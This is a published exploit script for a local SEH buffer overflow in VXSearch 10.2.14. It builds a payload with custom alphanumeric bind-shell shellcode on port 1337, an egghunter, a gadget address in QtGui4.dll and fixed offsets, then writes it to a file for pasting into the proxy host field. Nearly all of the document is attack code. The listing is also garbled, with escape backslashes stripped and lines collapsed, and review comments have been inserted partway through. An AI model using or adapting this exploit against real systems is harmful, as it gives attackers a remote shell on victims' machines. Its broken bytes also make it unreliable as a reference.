
VXSearch 10.2.14 Local SEH Overflow

Posted on 17 November 2017

#!/usr/bin/env python # # Exploit Title : VXSearch v10.2.14 Local SEH Overflow # Date : 11/16/2017 # Exploit Author : wetw0rk # Vendor Homepage : http://www.flexense.com/ # Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe # Version : 10.2.14 # Tested on : Windows 7 (x86) # Description : VX Search v10.2.14 suffers from a local buffer overflow. The # following exploit will generate a bind shell on port 1337. I # was unable to get a shell working with msfvenom shellcode so # below is a custom alphanumeric bind shell. Greetz rezkon ;) # # trigger the vulnerability by : # Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name # import struct shellcode = "w00tw00t" shellcode += ( "x25x4ax4dx4ex55" # and eax, 0x554e4d4a "x25x35x32x31x2a" # and eax, 0x2a313235 "x2dx6ax35x35x35" # sub eax, 0x3535356a "x2dx65x6ax6ax65" # sub eax, 0x656a6a65 "x2dx61x64x4dx65" # sub eax, 0x654d6461 "x50" # push eax "x5c" # pop esp ) shellcode += ( "x25x4ax4dx4ex55x25x35x32x31x2ax2dx4fx4fx4fx4f" "x2dx4fx30x4fx68x2dx62x2dx62x72x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx76x57x57x63x2dx77x36x39" "x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x54" "x54x54x2dx25x54x7ax2dx2dx25x52x76x36x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx49x35x49x49x2dx49" "x25x49x69x2dx64x25x72x6cx50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx70x33x33x25x2dx70x25x70x25x2d" "x4bx6ax56x39x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx79x55x75x32x2dx79x75x75x55x2dx79x77x77x78" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx25x4ax4a" "x25x2dx39x5fx4dx34x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx4bx57x4bx57x2dx70x76x4bx79x2dx70x76" "x78x79x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49" "x49x49x49x2dx49x4ex64x49x2dx78x25x78x25x2dx6f" "x25x7ax48x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x58x58x38x58x2dx58x30x32x58x2dx51x46x2dx47x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx5fx52x5fx5f" "x2dx5fx25x25x35x2dx62x39x25x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx4ax4ax4ax4ax2dx4ax4ax4a" "x4ax2dx79x39x4ax79x2dx6dx32x4bx68x50x25x4ax4d" 
# Review notes (comments only; the listing is otherwise reproduced byte-for-byte
# as rendered on this page):
# - Purpose, per the author's header: write a crafted proxy-host string to
#   pasteme.txt which, when pasted into the Proxy Host Name field of VX Search
#   10.2.14, overwrites the SEH record. This is a local PoC requiring a user at
#   the GUI; nothing in the listing contacts the application over the network.
# - Payload layout, taken from the final concatenation further down:
#   offset | shellcode | nSEH | SEH | egghunter | trigger, padded to 40000 bytes,
#   with the nSEH position given as 23920. The SEH value is a packed address the
#   author describes as a POP,POP,RET gadget in QtGui4.dll on Windows 7 (x86),
#   so the technique depends on that module and platform configuration.
# - Defensive relevance: a vendor-fixed build removes the overflow; SEH-overwrite
#   primitives of this kind are what SafeSEH/SEHOP-style protections target —
#   TODO confirm which mitigations apply to later builds of the affected module.
# - NOTE(review): the page's rendering has collapsed the original lines, so the
#   listing does not parse as shown and the string literals may not match the
#   author's original bytes. Treat this as reference text, not a runnable
#   script, and do not derive byte signatures from it without the original.
"x4ex55x25x35x32x31x2ax2dx30x30x71x30x2dx30x25" "x71x30x2dx38x31x51x5fx50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx32x32x32x32x2dx78x77x7ax77x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx62x62x62x62x2d" "x48x57x47x4fx50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx76x76x4fx4fx2dx36x39x5ax5ax50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx61x61x61x61x2dx4ax61x4a" "x25x2dx45x77x53x35x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx63x63x63x63x2dx39x63x63x2dx2dx32x63" "x7ax25x2dx31x49x7ax25x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx72x79x79x79x2dx25x30x25x30x2dx25" "x32x25x55x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x58x58x41x58x2dx58x58x25x77x2dx6ex51x32x69x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx48x77x38x48" "x2dx4ex76x6ex61x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx41x41x6ex6ex2dx31x31x30x6ex2dx37x36x30" "x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx38x38" "x38x38x2dx38x79x38x25x2dx38x79x38x25x2dx58x4c" "x73x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx61" "x52x61x52x2dx37x4ax31x49x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx4dx47x4dx4dx2dx30x25x4dx6bx2d" "x36x32x66x71x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx36x43x43x6cx2dx33x54x47x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx4cx4cx4cx4cx2dx6ex4cx6e" "x36x2dx65x67x6fx25x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx25x25x4bx4bx2dx25x25x6fx4bx2dx4ex41" "x59x2dx50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41" "x41x41x41x2dx52x52x78x41x2dx6ex6cx70x25x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx30x6cx30x30x2d" "x30x6cx6cx30x2dx38x70x79x66x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx42x70x70x45x2dx32x45x70x31" "x2dx25x4bx49x31x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx25x50x50x50x2dx25x7ax72x25x2dx4ex73x61" "x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x77" "x74x74x2dx61x78x35x34x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx30x30x30x30x2dx30x30x59x30x2dx30" "x30x74x51x2dx6bx36x79x67x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx75x38x43x43x2dx7ax31x43x43x2d" "x7ax2dx77x79x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx59x59x59x59x2dx59x59x59x59x2dx6fx6cx4dx77" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx45x45x45" 
"x45x2dx34x2dx76x45x2dx37x25x5ax65x50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx34x34x34x34x2dx62x34" "x34x34x2dx6dx56x47x57x50x25x4ax4dx4ex55x25x35" "x32x31x2ax2dx2dx2dx2dx2dx2dx76x2dx2dx76x2dx55" "x4cx55x7ax50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x77x77x77x30x2dx47x47x79x30x2dx42x42x39x34x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx56x75x36x51" "x2dx42x61x49x43x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx56x56x31x56x2dx31x79x31x25x2dx50x6cx48" "x34x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx72x72" "x72x72x2dx72x25x38x38x2dx38x25x25x25x2dx54x41" "x30x30x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx47" "x47x47x76x2dx47x47x76x76x2dx6bx72x6cx5ax50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx25x71x25x71x2d" "x73x42x63x68x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx48x55x51x51x2dx45x78x4fx5ax50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx45x45x45x32x2dx45x45x25" "x31x2dx76x75x2dx25x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx6ex4fx6dx6ex2dx35x48x5fx5fx50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx2dx2dx2dx2dx2dx71" "x2dx2dx71x2dx71x2dx4ax71x2dx66x65x70x62x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx56x30x56x30x2d" "x56x38x25x30x2dx74x37x25x45x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx32x32x32x77x2dx32x32x32x32" "x2dx43x41x4ax57x50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx63x63x63x30x2dx79x41x41x6ex50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx4bx4bx4bx4bx2dx4bx4b" "x25x31x2dx4bx71x25x32x2dx4fx6ex25x2dx50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx37x37x37x37x2dx6d" "x37x6dx37x2dx6dx37x6dx37x2dx64x55x63x58x50x25" "x4ax4dx4ex55x25x35x32x31x2ax2dx44x6cx6cx6cx2d" "x34x44x44x6cx2dx30x33x4ex54x50x25x4ax4dx4ex55" "x25x35x32x31x2ax2dx2dx7ax43x2dx2dx48x79x71x47" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41" "x41x2dx41x46x71x25x2dx5ax77x7ax32x50x25x4ax4d" "x4ex55x25x35x32x31x2ax2dx47x47x47x47x2dx47x6e" "x47x6ex2dx47x78x6ex78x2dx47x79x77x79x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx74x38x69x38x2dx51" "x4ax72x52x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x79x79x30x79x2dx4dx4dx2dx4dx2dx44x35x25x41x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx6fx6fx6fx31" 
"x2dx74x25x6fx33x2dx56x32x41x25x50x25x4ax4dx4e" "x55x25x35x32x31x2ax2dx54x54x54x54x2dx72x72x54" "x54x2dx79x69x49x56x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx70x70x70x70x2dx70x25x5ax70x2dx4ax38" "x36x72x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx6d" "x6dx6dx6dx2dx6dx6dx6dx46x2dx48x76x74x25x2dx53" "x7ax25x25x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x7ax7ax7ax43x2dx49x43x25x43x2dx25x5fx25x30x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx51x51x51x51" "x2dx51x51x51x70x2dx38x51x61x7ax2dx25x39x70x7a" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx37x44x37" "x6cx2dx78x30x6fx73x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx44x25x25x44x2dx76x25x76x76x2dx63x6c" "x63x74x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx42" "x47x74x4ex2dx33x6cx7ax39x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx7ax30x66x7ax2dx76x44x4fx49x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx41x41x41x41" "x2dx6dx67x33x6cx50x25x4ax4dx4ex55x25x35x32x31" "x2ax2dx51x51x51x51x2dx65x71x51x51x2dx49x76x7a" "x6ax50x25x4ax4dx4ex55x25x35x32x31x2ax2dx35x4a" "x42x35x2dx35x7ax7ax42x2dx76x7ax73x7ax50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx35x25x35x35x2dx35" "x25x76x35x2dx35x39x52x69x50x25x4ax4dx4ex55x25" "x35x32x31x2ax2dx74x74x74x5ax2dx36x5ax74x30x2d" "x25x32x6ax38x50x25x4ax4dx4ex55x25x35x32x31x2a" "x2dx75x75x43x75x2dx43x6fx41x30x2dx39x64x30x34" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx74x2dx58" "x6ex2dx78x47x35x69x50x25x4ax4dx4ex55x25x35x32" "x31x2ax2dx66x79x4fx66x2dx48x7ax25x47x50x25x4a" "x4dx4ex55x25x35x32x31x2ax2dx42x42x7ax42x2dx33" "x6dx55x32x50x25x4ax4dx4ex55x25x35x32x31x2ax2d" "x61x61x61x41x2dx61x39x64x25x2dx59x33x7ax34x50" "x25x4ax4dx4ex55x25x35x32x31x2ax2dx66x66x66x66" "x2dx41x41x66x66x2dx25x33x66x66x2dx34x25x6dx43" "x50x25x4ax4dx4ex55x25x35x32x31x2ax2dx49x49x32" "x49x2dx49x59x25x49x2dx72x74x25x6dx50" ) shellcode += "A" * 4000 egghunter = "A" * 40 # serve as NOP's egghunter += ( "x25x4ax4dx4ex55" # and eax, 0x554e4d4a "x25x35x32x31x2a" # and eax, 0x2a313235 "x2dx58x58x58x58" # sub eax, 0x58585858 "x2dx58x58x67x58" # sub eax, 0x58675858 "x2dx5ax4fx2dx4f" # sub eax, 0x4f2d4f5a 
# The second stage below is the author's "egghunter"; it presumably locates the
# "w00tw00t" tag that prefixes `shellcode` (the listing does not decode it, so
# this is inferred from the naming). The numbers that follow — 23920 to nSEH,
# 40000 total — are the page's own figures, and the final line writes the
# assembled string to pasteme.txt without any further transformation.
"x50" # push eax "x5c" # pop esp ) egghunter += ( "%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-" "r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%" "JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6" "W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5" "21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP" ) offset = "A" * (23920-len(shellcode)) # offset to nSEH nSEH = "x74x26x75x26" # JE/JNZ + 38 (decimal) SEH = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint]) trigger = "A" * (40000 - ( len(offset) + len(nSEH) + len(SEH) + len(egghunter) + len(shellcode) ) ) payload = offset + shellcode + nSEH + SEH + egghunter + trigger print "[*] payload written to pasteme.txt" fd = open("pasteme.txt", 'w') fd.write(payload) fd.close()

 
